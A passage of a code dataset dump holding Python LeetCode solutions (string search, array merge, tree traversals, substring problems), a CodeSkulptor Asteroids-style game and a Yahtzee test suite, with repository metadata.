"text": "class Solution:\n # @param haystack, a string\n # @param needle, a string\n # @return a string or None\n def strStr(self, haystack, needle):\n '''\n Implement strStr().\n\nReturns a pointer to the first occurrence of needle in haystack, or null if needle is not part of haystack. \n '''\n return self.kmp(haystack, needle)\n\n def kmp(self, s, t):\n if len(t) == 0:\n return s\n p = [-1] * len(t)\n j = -1\n for i in range(1, len(t)):\n while j >= 0 and t[j + 1] != t[i]:\n j = p[j]\n if t[j + 1] == t[i]:\n j += 1\n p[i] = j\n\n j = -1\n for i in range(len(s)):\n while j >= 0 and s[i] != t[j + 1]:\n j = p[j]\n if s[i] == t[j + 1]:\n j += 1\n if j == len(t) - 1:\n return s[i - j:]\n return None\n\ns0 = ['abcabdabdedd', 'abd']\ns1 = ['a', '']\ns2 = ['babba', 'bbb']\ns3 = ['abcddef', 'ddek']\ns = s3\nprint(s)\nprint(Solution.strStr(Solution(), s[0], s[1]))"
},
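A hedged sketch of the prefix (failure) table that the KMP-based strStr above depends on, written in the more common 0-based convention rather than the file's -1-based one; the helper name is mine.

def prefix_table(pattern):
    """p[i] = length of the longest proper prefix of pattern[:i+1]
    that is also a suffix of it."""
    p = [0] * len(pattern)
    k = 0
    for i in range(1, len(pattern)):
        while k > 0 and pattern[i] != pattern[k]:
            k = p[k - 1]                 # fall back to the next shorter border
        if pattern[i] == pattern[k]:
            k += 1
        p[i] = k
    return p

assert prefix_table("abcabd") == [0, 0, 0, 1, 2, 0]
assert prefix_table("aaaa") == [0, 1, 2, 3]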
{
"alpha_fraction": 0.43406593799591064,
"alphanum_fraction": 0.46978020668029785,
"avg_line_length": 28.54054069519043,
"blob_id": "6cd8f562c98bfd14a5f1e0470bfbd4ccdac588cc",
"content_id": "0c20f2f8a6b336517de090c3b857b580a6cfdbef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1092,
"license_type": "no_license",
"max_line_length": 187,
"num_lines": 37,
"path": "/Merge Sorted Array.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param A a list of integers\n # @param m an integer, length of A\n # @param B a list of integers\n # @param n an integer, length of B\n # @return nothing\n def merge(self, A, m, B, n):\n '''\n Given two sorted integer arrays A and B, merge B into A as one sorted array.\n\nNote:\nYou may assume that A has enough space (size that is greater or equal to m + n) to hold additional elements from B. The number of elements initialized in A and B are m and n respectively.\n '''\n for i in range(m - 1, -1, -1):\n A[i + n] = A[i]\n l1, r1 = n, m + n\n l2, r2 = 0, n\n l = 0\n while l1 < r1 and l2 < r2:\n if A[l1] < B[l2]:\n A[l] = A[l1]\n l1 += 1\n else:\n A[l] = B[l2]\n l2 += 1\n l += 1\n if l1 == r1:\n for i in range(l2, r2):\n A[l] = B[i]\n l += 1\n\na1 = [[1, 0], [2]]\na = a1\nprint(a[0])\nprint(a[1])\nprint(Solution.merge(Solution(), a[0], 1, a[1], len(a[1])))\nprint(a[0])"
},
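The file first shifts A's contents right and then merges forward; a common alternative, sketched below under the same assumption about A's spare capacity, fills A from the back and needs no initial shift (function name is mine).

def merge_from_back(A, m, B, n):
    """Merge B (length n) into A, whose first m slots hold sorted values
    and which has at least m + n total slots."""
    i, j, k = m - 1, n - 1, m + n - 1
    while j >= 0:                      # once B is exhausted, A is already in place
        if i >= 0 and A[i] > B[j]:
            A[k] = A[i]
            i -= 1
        else:
            A[k] = B[j]
            j -= 1
        k -= 1

A = [1, 3, 5, 0, 0]
merge_from_back(A, 3, [2, 4], 2)
assert A == [1, 2, 3, 4, 5]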
{
"alpha_fraction": 0.3584097921848297,
"alphanum_fraction": 0.3969419002532959,
"avg_line_length": 28.727272033691406,
"blob_id": "e088d2c97b91b1e5ad840e36e710fc3f949e2ceb",
"content_id": "a4a60cebc7d3e8df4692e90555a5487474910dc4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1635,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 55,
"path": "/Longest Consecutive Sequence.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param num, a list of integer\n # @return an integer\n def longestConsecutive(self, num):\n ''' Given an unsorted array of integers, find the length of the longest consecutive elements sequence.\n\nFor example,\nGiven [100, 4, 200, 1, 3, 2],\nThe longest consecutive elements sequence is [1, 2, 3, 4]. Return its length: 4.\n\nYour algorithm should run in O(n) complexity. '''\n down = {}\n up = {}\n prenum = set()\n for x in num:\n if x in prenum:\n continue\n flag = 0\n if x + 1 in down:\n r = down.pop(x + 1)\n down[x] = r\n up[r] = x\n if x in up:\n l = up.pop(x)\n r = down.pop(x)\n up[r] = l\n down[l] = r\n flag += 1\n if x - 1 in up:\n l = up.pop(x - 1)\n up[x] = l\n down[l] = x\n if x in down:\n l = up.pop(x)\n r = down.pop(x)\n up[r] = l\n down[l] = r\n flag += 1\n if flag == 0:\n down[x] = x\n up[x] = x\n prenum.add(x)\n max_con = 0\n for l in up:\n t = l - up[l] + 1\n max_con = max(max_con, t)\n #print(up)\n #print(down)\n return max_con\n\nnum1 = [100, 1, 2, 200, 4, 3, 7, 5, 6]\nnum2 = [-7, -1, 3, -9, -4, 7, -3, 2, 4, 9, 4, -9, 8, -7, 5, -1, -7]\nnum0 = [3, 4, 4, 5]\nnum = num2\nprint(Solution.longestConsecutive(Solution(), num))\n"
},
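A hedged sketch of the more usual O(n) hash-set solution to the same problem; the record's up/down interval bookkeeping computes the same answer by merging runs incrementally.

def longest_consecutive(nums):
    values = set(nums)
    best = 0
    for x in values:
        if x - 1 not in values:        # x is the start of a run
            length = 1
            while x + length in values:
                length += 1
            best = max(best, length)
    return best

assert longest_consecutive([100, 4, 200, 1, 3, 2]) == 4
assert longest_consecutive([]) == 0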
{
"alpha_fraction": 0.48042261600494385,
"alphanum_fraction": 0.48684483766555786,
"avg_line_length": 24.956989288330078,
"blob_id": "3e7ed55a87c4c5168800e9928f1665d51694e84d",
"content_id": "cdbe72596b36823ae673068070a3e343a1dd68b9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4827,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 186,
"path": "/Binary Tree Postorder&Preorder Traversal.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Filename : Binary Tree Postorder/Preorder Traversal\n\n\n# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n # @param root, a tree node\n # @return a list of integers\n def preorderTraversal(self, root):\n \"\"\"Given a binary tree, return the preorder traversal of its nodes' values.\n\nFor example:\nGiven binary tree {1,#,2,3},\n\n 1\n \\\n 2\n /\n 3\n\nreturn [1,2,3].\n\nNote: Recursive solution is trivial, could you do it iteratively?\"\"\"\n return self.doPreNonRecursively_Morris(root)\n\n # @param root, a tree node\n # @return a list of integers\n def postorderTraversal(self, root):\n \"\"\"Given a binary tree, return the postorder traversal of its nodes' values.\n\nFor example:\nGiven binary tree {1,#,2,3},\n\n 1\n \\\n 2\n /\n 3\n\nreturn [3,2,1].\n\nNote: Recursive solution is trivial, could you do it iteratively?\"\"\"\n return self.doPostNonRecursively_Morris(root)\n\n def doPostRecursively(self, node):\n if node is None:\n return []\n llist = self.doPostRecursively(node.left)\n rlist = self.doPostRecursively(node.right)\n llist.extend(rlist)\n llist.append(node.val)\n return llist\n\n def doPostNonRecursively(self, root):\n if root is None:\n return []\n res = []\n stack = []\n status = {}\n stack.append(root)\n status[root] = 0\n while len(stack) > 0:\n node = stack.pop()\n if status[node] == 1:\n res.append(node.val)\n continue\n stack.append(node)\n status[node] = 1\n status[node.right] = 1\n status[node.left] = 1\n if node.right:\n stack.append(node.right)\n status[node.right] = 0\n if node.left:\n stack.append(node.left)\n status[node.left] = 0\n return res\n\n def doPreRecursively(self, node):\n if node is None:\n return []\n list = [node.val]\n llist = self.doPreRecursively(node.left)\n rlist = self.doPreRecursively(node.right)\n list.extend(llist)\n list.extend(rlist)\n return list\n\n def doPreNonRecursively(self, root):\n if root is None:\n return []\n res = []\n stack = []\n status = {}\n stack.append(root)\n while len(stack) > 0:\n node = stack.pop()\n res.append(node.val)\n if node.right:\n stack.append(node.right)\n if node.left:\n stack.append(node.left)\n return res\n\n def doPreNonRecursively_Morris(self, root):\n cur = root\n l = []\n while cur:\n\n if cur.left:\n rightmost = cur.left\n while rightmost.right and rightmost.right != cur:\n rightmost = rightmost.right\n if rightmost.right == cur:\n cur = cur.right\n rightmost.right = None\n else:\n l.append(cur.val)\n rightmost.right = cur\n cur = cur.left\n else:\n l.append(cur.val)\n cur = cur.right\n return l\n\n def doPostNonRecursively_Morris(self, root):\n cur = TreeNode(-1)\n cur.left = root\n l = []\n while cur:\n if cur.left:\n rightmost = cur.left\n while rightmost.right and rightmost.right != cur:\n rightmost = rightmost.right\n if rightmost.right != cur:\n rightmost.right = cur\n cur = cur.left\n else:\n t = cur.left\n tl = []\n while t != cur:\n tl.append(t.val)\n t = t.right\n tl.reverse()\n l += tl\n rightmost.right = None\n cur = cur.right\n else:\n cur = cur.right\n return l\n\n\n# Definition for a binary tree node\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n def show(self):\n if self is None:\n return\n print(self.val, end=\" \")\n if self.left or self.right:\n if self.left:\n self.left.show()\n else:\n print(\"#\", end=\" \")\n if self.right:\n self.right.show()\n else:\n print(\"#\", end=\" \")\n\na = TreeNode(2)\nb = 
TreeNode(3)\nc = TreeNode(1)\na.show()\nprint()\ns = Solution()\nx = s.postorderTraversal(a)\nprint(x)"
},
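Morris traversal (used above) is O(1) space but subtle; the stack-based preorder the file also implements is easier to see in isolation. A minimal sketch with illustrative names:

class TreeNode:
    def __init__(self, val, left=None, right=None):
        self.val, self.left, self.right = val, left, right

def preorder_iterative(root):
    out, stack = [], [root] if root else []
    while stack:
        node = stack.pop()
        out.append(node.val)
        if node.right:                 # push right first so left is visited first
            stack.append(node.right)
        if node.left:
            stack.append(node.left)
    return out

# the {1, #, 2, 3} tree from the docstrings above
tree = TreeNode(1, right=TreeNode(2, left=TreeNode(3)))
assert preorder_iterative(tree) == [1, 2, 3]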
{
"alpha_fraction": 0.6220806837081909,
"alphanum_fraction": 0.6326963901519775,
"avg_line_length": 38.29166793823242,
"blob_id": "3614838ee4651077dd913bce25a105b87dd440e9",
"content_id": "d902a81c2198e4973517d113997ac9e6628ecc78",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 942,
"license_type": "no_license",
"max_line_length": 267,
"num_lines": 24,
"path": "/Longest Substring Without Repeating Characters.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return an integer\n def lengthOfLongestSubstring(self, s):\n '''\n Given a string, find the length of the longest substring without repeating characters. For example, the longest substring without repeating letters for \"abcabcbb\" is \"abc\", which the length is 3. For \"bbbbb\" the longest substring is \"b\", with the length of 1.\n '''\n dic = {}\n maxlen = 0\n start = 0\n for i in range(len(s)):\n if s[i] in dic and dic[s[i]] > start:\n maxlen = max(maxlen, i - start)\n start = dic[s[i]]\n dic[s[i]] = i + 1\n maxlen = max(maxlen, len(s) - start)\n return maxlen\n\ns1 = \"wlrbbmqbhcdarzowkkyhiddqscdxrjmowfrxsjybldbefsarcbynecdyggxxpklorellnmpapqfwkhopkmco\"\ns2 = \"aaabcabc\"\ns3 = \"ruowzgiooobpple\"\ns4 = \"qopubjguxhxdipfzwswybgfylqvjzhar\"\ns = s4\nprint(len(s), s)\nprint(Solution.lengthOfLongestSubstring(Solution(), s))"
}
] | 115 |
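A hedged sketch of the sliding-window idea behind lengthOfLongestSubstring in the last record above, tracking the most recent index of each character (variable names are mine):

def length_of_longest_substring(s):
    last, start, best = {}, 0, 0
    for i, ch in enumerate(s):
        if ch in last and last[ch] >= start:
            start = last[ch] + 1       # jump the window past the repeat
        last[ch] = i
        best = max(best, i - start + 1)
    return best

assert length_of_longest_substring("abcabcbb") == 3
assert length_of_longest_substring("bbbbb") == 1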
rehmanis/Coursera | https://github.com/rehmanis/Coursera | 96d4b2a4ad832e13dd887fc28fd3e97f93b272ed | c9b376c474ccaea626e4c2c6f6b127975387c190 | 0229fceba50a82b51dee439d697c0fb7be4d36fa | refs/heads/master | 2020-12-05T22:19:42.811993 | 2019-08-26T21:39:17 | 2019-08-26T21:39:17 | 66,798,996 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5932977795600891,
"alphanum_fraction": 0.6113688349723816,
"avg_line_length": 34.40196228027344,
"blob_id": "cf31a1cf39f1482f6dba2b49d32676a78e10a4aa",
"content_id": "62cf2fba20ff74422b2148bfdc49bb23a0ad2250",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14443,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 408,
"path": "/Fundamentals of Computing Specialization/Interactive Programming in Python (Part 2)/Mini-Project8 RiceRocks(Asteroids)/RiceRocks.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# program template for Spaceship\nimport simplegui\nimport math\nimport random\n\n# globals for user interface\nWIDTH = 800\nHEIGHT = 600\nROTATE_STEP = 0.0873\nCOEFF_FRIC = 0.02\nMAX_ROCK_ANG_VEL = 0.1\nMIN_ROCK_ANG_VEL = -0.1\nINIT_MAX_ROCK_VEL = 0.3\nINIT_MIN_ROCK_VEL = -0.3\nMAX_NUM_OF_ROCKS = 12\nACC = 0.2\n\nmax_rock_vel = INIT_MAX_ROCK_VEL\nmin_rock_vel = INIT_MIN_ROCK_VEL\nscore_to_change_vel = 5\nvel_multiplier = 1\nscore = 0\nlives = 3\ntime = 0\nstarted = False\n\nclass ImageInfo:\n def __init__(self, center, size, radius = 0, lifespan = None, animated = False):\n self.center = center\n self.size = size\n self.radius = radius\n if lifespan:\n self.lifespan = lifespan\n else:\n self.lifespan = float('inf')\n self.animated = animated\n\n def get_center(self):\n return self.center\n\n def get_size(self):\n return self.size\n\n def get_radius(self):\n return self.radius\n\n def get_lifespan(self):\n return self.lifespan\n\n def get_animated(self):\n return self.animated\n\n \n# art assets created by Kim Lathrop, may be freely re-used in non-commercial projects, please credit Kim\n \n# debris images - debris1_brown.png, debris2_brown.png, debris3_brown.png, debris4_brown.png\n# debris1_blue.png, debris2_blue.png, debris3_blue.png, debris4_blue.png, debris_blend.png\ndebris_info = ImageInfo([320, 240], [640, 480])\ndebris_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/debris2_blue.png\")\n\n# nebula images - nebula_brown.png, nebula_blue.png\nnebula_info = ImageInfo([400, 300], [800, 600])\nnebula_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/nebula_blue.f2014.png\")\n\n# splash image\nsplash_info = ImageInfo([200, 150], [400, 300])\nsplash_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/splash.png\")\n\n# ship image\nship_info = ImageInfo([45, 45], [90, 90], 35)\nship_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/double_ship.png\")\n\n# missile image - shot1.png, shot2.png, shot3.png\nmissile_info = ImageInfo([5,5], [10, 10], 3, 50)\nmissile_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/shot2.png\")\n\n# asteroid images - asteroid_blue.png, asteroid_brown.png, asteroid_blend.png\nasteroid_info = ImageInfo([45, 45], [90, 90], 40)\nasteroid_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/asteroid_blue.png\")\n\n# animated explosion - explosion_orange.png, explosion_blue.png, explosion_blue2.png, explosion_alpha.png\nexplosion_info = ImageInfo([64, 64], [128, 128], 17, 24, True)\nexplosion_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/explosion_alpha.png\")\n\n# sound assets purchased from sounddogs.com, please do not redistribute\nsoundtrack = simplegui.load_sound(\"http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/soundtrack.mp3\")\nmissile_sound = simplegui.load_sound(\"http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/missile.mp3\")\nmissile_sound.set_volume(.5)\nship_thrust_sound = simplegui.load_sound(\"http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/thrust.mp3\")\nexplosion_sound = simplegui.load_sound(\"http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/explosion.mp3\")\n\n# alternative upbeat soundtrack by composer and former IIPP 
student Emiel Stopler\n# please do not redistribute without permission from Emiel at http://www.filmcomposer.nl\n#soundtrack = simplegui.load_sound(\"https://storage.googleapis.com/codeskulptor-assets/ricerocks_theme.mp3\")\n\n# helper functions to handle transformations\ndef angle_to_vector(ang):\n return [math.cos(ang), math.sin(ang)]\n\ndef dist(p,q):\n return math.sqrt((p[0] - q[0]) ** 2+(p[1] - q[1]) ** 2)\n\n# helper function to update and draw sprite in a group\ndef process_sprite_group(group_of_sprite, canvas):\n for sprite in set(group_of_sprite):\n sprite.draw(canvas)\n if (sprite.update()):\n group_of_sprite.remove(sprite)\n \n# helper function to check collision between a group of sprite and a single sprite \ndef group_collide(group_of_sprite, other_object):\n # initialize the global variables\n global an_explosion_group\n \n collision = False\n for sprite in set(group_of_sprite):\n if sprite.collide(other_object):\n group_of_sprite.remove(sprite)\n an_explosion_group.add(Sprite(sprite.get_position(), sprite.get_velocity(), \n sprite.get_angle(), 0, \n explosion_image, explosion_info, explosion_sound))\n collision = True\n \n return collision\n\n# helper function to check collisions between a group of sprite and other group of sprite\ndef group_group_collise(group_sprite, other_group_sprite):\n num_collisions = 0\n for sprite in set(group_sprite):\n if (group_collide(other_group_sprite, sprite)):\n group_sprite.remove(sprite)\n num_collisions += 1\n \n return num_collisions\n\n# Ship class\nclass Ship:\n def __init__(self, pos, vel, angle, image, info):\n self.pos = [pos[0],pos[1]]\n self.vel = [vel[0],vel[1]]\n self.thrust = False\n self.angle = angle\n self.angle_vel = 0\n self.image = image\n self.image_center = info.get_center()\n self.image_size = info.get_size()\n self.radius = info.get_radius()\n \n def draw(self,canvas):\n if (self.thrust):\n canvas.draw_image(self.image, [self.image_center[0] + self.image_size[0],self.image_center[1]],\n self.image_size, self.pos, self.image_size, self.angle)\n else:\n canvas.draw_image(self.image, self.image_center, self.image_size, self.pos, self.image_size,\n self.angle)\n \n def update(self):\n # position update\n self.pos[0] = (self.pos[0] + self.vel[0]) % WIDTH \n self.pos[1] = (self.pos[1] + self.vel[1]) % HEIGHT \n \n # add friction\n self.vel[0] *= (1 - COEFF_FRIC)\n self.vel[1] *= (1 - COEFF_FRIC)\n \n # update angular position\n self.angle += self.angle_vel\n \n # calculate the forward vector of the ship\n forward = angle_to_vector(self.angle)\n \n # update the velocity in the direction of forward vector\n if (self.thrust):\n self.vel[0] += ACC * forward[0]\n self.vel[1] += ACC * forward[1]\n \n def shoot_missile(self):\n global a_missile\n \n missile_pos = []\n missile_vel = []\n \n forward = angle_to_vector(self.angle)\n \n missile_pos.append(self.pos[0] + self.radius * forward[0])\n missile_pos.append(self.pos[1] + self.radius * forward[1])\n \n missile_vel.append(self.vel[0] + 6 * forward[0])\n missile_vel.append(self.vel[1] + 6 * forward[1])\n \n a_missile = Sprite(missile_pos, missile_vel, self.angle, 0, missile_image, missile_info, missile_sound)\n a_missile_group.add(a_missile)\n\n \n def increment_angle_vel(self):\n self.angle_vel += ROTATE_STEP\n \n def decrement_angle_vel(self):\n self.angle_vel -= ROTATE_STEP\n \n def stop_rotation(self):\n self.angle_vel = 0\n \n def set_thrust(self, is_thrust_on):\n self.thrust = is_thrust_on\n \n if (is_thrust_on):\n ship_thrust_sound.play()\n else:\n 
ship_thrust_sound.rewind()\n \n def get_position(self):\n return self.pos\n \n def get_radius(self):\n return self.radius\n \n \n# Sprite class\nclass Sprite:\n def __init__(self, pos, vel, ang, ang_vel, image, info, sound = None):\n self.pos = [pos[0],pos[1]]\n self.vel = [vel[0],vel[1]]\n self.angle = ang\n self.angle_vel = ang_vel\n self.image = image\n self.image_center = info.get_center()\n self.image_size = info.get_size()\n self.radius = info.get_radius()\n self.lifespan = info.get_lifespan()\n self.animated = info.get_animated()\n self.age = 0\n if sound:\n sound.rewind()\n sound.play()\n \n def draw(self, canvas):\n if (self.animated):\n canvas.draw_image(self.image, [self.image_center[0] + self.image_size[0] * self.age, self.image_center[1]], \n self.image_size, self.pos, self.image_size, self.angle)\n else:\n canvas.draw_image(self.image, self.image_center, self.image_size, self.pos, \n self.image_size, self.angle)\n \n def update(self):\n \n # position update\n self.pos[0] = (self.pos[0] + self.vel[0]) % WIDTH \n self.pos[1] = (self.pos[1] + self.vel[1]) % HEIGHT \n \n # update angular position (for it to be rotating)\n self.angle += self.angle_vel\n \n # increment the age\n self.age += 1\n \n # check to see if the age of the sprite has exceeded its lifespan\n if (self.age < self.lifespan):\n return False\n else:\n return True\n \n def get_position(self):\n return self.pos\n \n def get_radius(self):\n return self.radius\n \n def get_velocity(self):\n return self.vel\n \n def get_angle(self):\n return self.angle\n \n def get_angle_vel(self):\n return self.angle_vel\n \n def collide(self, other_object):\n if (dist(self.pos, other_object.get_position()) <= self.radius + other_object.get_radius()):\n return True\n else:\n return False\n \n\n \ndef draw(canvas):\n global time, started, lives, score, a_rock_group, an_explosion, vel_multiplier\n \n # animiate background\n time += 1\n wtime = (time / 4) % WIDTH\n center = debris_info.get_center()\n size = debris_info.get_size()\n canvas.draw_image(nebula_image, nebula_info.get_center(), nebula_info.get_size(), [WIDTH / 2, HEIGHT / 2], [WIDTH, HEIGHT])\n canvas.draw_image(debris_image, center, size, (wtime - WIDTH / 2, HEIGHT / 2), (WIDTH, HEIGHT))\n canvas.draw_image(debris_image, center, size, (wtime + WIDTH / 2, HEIGHT / 2), (WIDTH, HEIGHT))\n\n # draw the score\n canvas.draw_text(\"Score: \" +str(score), (WIDTH/10.0, HEIGHT/10.0), 30, 'white')\n canvas.draw_text(\"Lives: \" +str(lives), (WIDTH * 8/10.0, HEIGHT/10.0), 30, 'white')\n \n \n # draw and update ships\n my_ship.draw(canvas)\n my_ship.update()\n \n # draw and update the group of sprite\n process_sprite_group(a_rock_group, canvas)\n process_sprite_group(a_missile_group, canvas)\n process_sprite_group(an_explosion_group, canvas)\n \n # draw splash screen if not started\n if not started:\n canvas.draw_image(splash_image, splash_info.get_center(), \n splash_info.get_size(), [WIDTH / 2, HEIGHT / 2], \n splash_info.get_size())\n \n else:\n # check for collision between ship and rocks\n if group_collide(a_rock_group, my_ship):\n lives -= 1\n if (lives <= 0):\n started = False\n vel_multiplier = 1\n a_rock_group = set()\n timer.stop()\n soundtrack.rewind()\n \n # update the rock to missile collision and update the score \n score += group_group_collise(a_missile_group, a_rock_group)\n\n \n \n \ndef keydown(key):\n if (key == simplegui.KEY_MAP[\"left\"]):\n my_ship.stop_rotation()\n my_ship.decrement_angle_vel()\n elif (key == simplegui.KEY_MAP[\"right\"]):\n 
my_ship.stop_rotation()\n my_ship.increment_angle_vel()\n elif (key == simplegui.KEY_MAP[\"up\"]):\n my_ship.set_thrust(True)\n elif (key == simplegui.KEY_MAP[\"space\"]):\n my_ship.shoot_missile()\n\ndef keyup(key): \n if (key == simplegui.KEY_MAP[\"left\"] or key == simplegui.KEY_MAP[\"right\"]):\n my_ship.stop_rotation()\n elif (key == simplegui.KEY_MAP[\"up\"]):\n my_ship.set_thrust(False) \n \n# mouseclick handlers that reset UI and conditions whether splash image is drawn \ndef click(pos):\n global started, lives, score\n center = [WIDTH / 2, HEIGHT / 2]\n size = splash_info.get_size()\n inwidth = (center[0] - size[0] / 2) < pos[0] < (center[0] + size[0] / 2)\n inheight = (center[1] - size[1] / 2) < pos[1] < (center[1] + size[1] / 2)\n if (not started) and inwidth and inheight:\n started = True\n lives = 3\n score = 0\n timer.start()\n soundtrack.play()\n\n# timer handler that spawns a rock \ndef rock_spawner():\n global a_rock_group, vel_multiplier, score_to_change_vel\n \n if (score >= score_to_change_vel):\n score_to_change_vel += 5\n vel_multiplier += 3\n \n if (len(a_rock_group) < MAX_NUM_OF_ROCKS):\n pos = []\n vel = []\n pos.append(random.randrange(0,WIDTH))\n pos.append(random.randrange(0, HEIGHT))\n vel.append(random.random() * ((max_rock_vel - min_rock_vel) + min_rock_vel)*vel_multiplier)\n vel.append(random.random() * ((max_rock_vel - min_rock_vel) + min_rock_vel)*vel_multiplier)\n ang = random.random() * (MAX_ROCK_ANG_VEL - MIN_ROCK_ANG_VEL) + MIN_ROCK_ANG_VEL\n \n a_rock = Sprite(pos, vel, 0, ang, asteroid_image, asteroid_info);\n if dist(a_rock.get_position(), my_ship.get_position()) > 1.5 * (a_rock.get_radius() + my_ship.get_radius()):\n a_rock_group.add(Sprite(pos, vel, 0, ang, asteroid_image, asteroid_info))\n \n \n \n# initialize frame\nframe = simplegui.create_frame(\"Asteroids\", WIDTH, HEIGHT)\n\n# initialize ship and two sprites\nmy_ship = Ship([WIDTH / 2, HEIGHT / 2], [0, 0], -1.57, ship_image, ship_info)\na_rock_group = set()\na_missile_group = set()\nan_explosion_group = set()\n\n# register handlers\nframe.set_draw_handler(draw)\nframe.set_keydown_handler(keydown)\nframe.set_keyup_handler(keyup)\nframe.set_mouseclick_handler(click)\n\ntimer = simplegui.create_timer(1000.0, rock_spawner)\n\n# get things rolling\nframe.start()"
},
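Sprite.collide and group_collide in the RiceRocks file above reduce to a circle-overlap test: two objects collide when the distance between their centers is at most the sum of their radii. A minimal sketch (function name mine; plain Python rather than CodeSkulptor):

import math

def circles_collide(p, rp, q, rq):
    """True when circles (center p, radius rp) and (center q, radius rq) overlap."""
    return math.hypot(p[0] - q[0], p[1] - q[1]) <= rp + rq

assert circles_collide((0, 0), 1.0, (1.5, 0), 1.0)        # overlapping
assert not circles_collide((0, 0), 1.0, (3.0, 0), 1.0)    # apart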
{
"alpha_fraction": 0.5632233619689941,
"alphanum_fraction": 0.6069155335426331,
"avg_line_length": 38.01694869995117,
"blob_id": "e2051f6bbd127d8a8978c4a53bdcb9c29be51156",
"content_id": "e914ca84fb5578165791c399dca4016acb628d13",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6912,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 177,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 1)/Mini-Project4 Game Yahtzee/game_yahtzee_testsuite.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nTesting suite for functions used in one implementation\nof Yathzee game\n\"\"\"\n# http://www.codeskulptor.org/#user46_i4ScIuelhi_93.py\nimport poc_simpletest\n \ndef run_suite_gen_all_holds(gen_all_holds):\n \"\"\"\n Some basic testing code for testing generation of all possible\n dices that can be held in Yahtzee\n \"\"\"\n \n # create a TestSuite object\n suite = poc_simpletest.TestSuite() \n \n print \"running gen_all_holds function test...\"\n \n # test the gen_all_hold\n # Test #1.1: hand is empty. Should return a set with one empty tuple\n hand = ()\n poss_holds = gen_all_holds(hand)\n # run the Test #1.1 and compare the expected vs actual output\n suite.run_test(str(len(poss_holds)), str(1), \"Test #1.1: gen_all_hold\")\n \n # Test #1.2: hand is of length one. Should return a set with two tuples\n hand = (1,)\n poss_holds = gen_all_holds(hand)\n holds_exp = set((),(1,))\n # run the Test #1.2 and compare the expected vs actual output\n suite.run_test(str(len(poss_holds.intersection(holds_exp))), str(0), \n \"Test #1.2: gen_all_hold\")\n \n # Test #1.3: hand values are distinct. Should return a set of length \n # 2^(lenght of hand)\n hand = (0,1,2)\n poss_holds = gen_all_holds(hand)\n holds_exp = set((), (0,), (1,), (2,), (0,1), (0,2), (1,2), (0,1,2))\n # run the Test #1.3 and compare the expected vs actual output\n suite.run_test(str(len(poss_holds.intersection(holds_exp))), str(0), \n \"Test #1.3: gen_all_hold\")\n \n # Test #1.4: hand values are all same.\n hand = (1,1,1)\n poss_holds = gen_all_holds(hand)\n holds_exp = set((), (1,), (1,1), (1,1,1))\n # run the Test #1.4 and compare the expected vs actual output\n suite.run_test(str(len(poss_holds.intersection(holds_exp))), str(0), \n \"Test #1.4: gen_all_hold\")\n \n # Test #1.5: hand values have some distinct and some repeated values.\n hand = (1,1,1,2,5)\n poss_holds = gen_all_holds(hand)\n holds_exp = set((), (1,), (2,), (5,), (1,1), (1,2), (1,5), (2,5), \n (1,1,1), (1,1,2), (1,1,5), (1,2,5), (1,1,1,2), \n (1,1,1,5), (1,1,2,5), (1,1,2,5))\n # run the Test #1.5 and compare the expected vs actual output\n suite.run_test(str(len(poss_holds.intersection(holds_exp))), str(0), \n \"Test #1.5: gen_all_hold\")\n \n # report number of tests and failures\n suite.report_results()\n print\n \ndef run_suite_score(score):\n \"\"\"\n Some basic testing code for testing score function \n for the Yahtzee dice game\n \"\"\"\n \n # create a TestSuite object\n suite = poc_simpletest.TestSuite() \n \n print \"running score function test...\"\n \n # test the score function of Yahtzee \n # Test #2.1: hand is empty. Should return a score zero\n hand = ()\n max_score = score(hand)\n # run the Test #2.1 and compare the expected vs actual output\n suite.run_test(str(max_score), str(0), \"Test #2.1: score\")\n \n # Test #2.2: hand has one value. Should return this value\n hand = (4,)\n max_score = score(hand)\n # run the Test #2.2 and compare the expected vs actual output\n suite.run_test(str(max_score), str(4), \"Test #2.2: score\")\n \n # Test #2.3: hand has all same values. Should return this \n # value time its number of occurances\n hand = (4,4,4,4)\n max_score = score(hand)\n # run the Test #2.3 and compare the expected vs actual output\n suite.run_test(str(max_score), str(16), \"Test #2.3: score\")\n \n # Test 